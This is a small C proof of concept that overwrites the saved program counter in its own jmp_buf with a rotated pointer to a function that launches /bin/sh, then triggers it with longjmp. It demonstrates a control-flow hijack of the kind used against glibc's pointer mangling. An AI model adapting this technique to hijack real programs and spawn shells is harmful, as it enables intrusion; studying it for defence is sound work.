#include <stdio.h>
#include <setjmp.h>
#include <stdint.h>
#include <limits.h>
#ifdef __i386__
#define ROTATE 0x9
#define PC_ENV_OFFSET 0x14
#elif __x86_64__
#define ROTATE 0x11
#define PC_ENV_OFFSET 0x38
#else
#error The exploit does not support this architecture
#endif
unsigned long rol(uintptr_t value) {
return (value << ROTATE) | (value >> (__WORDSIZE - ROTATE));
}
int hacked(){
printf( "[+] hacked !!\n" );
system( "/bin/sh" );
}
int main( void ){
jmp_buf env;
uintptr_t *ptr_ret_env = (uintptr_t*) (((uintptr_t) env) + PC_ENV_OFFSET);
printf( "[+] Exploiting ...\n" );
if (setjmp(env) == 1){
printf( "[-] Exploit failed.\n" );
return 0;
}
*ptr_ret_env = rol((uintptr_t)hacked);
longjmp(env, 1);
printf( "[-] Exploit failed.\n" );
return 0;
}
|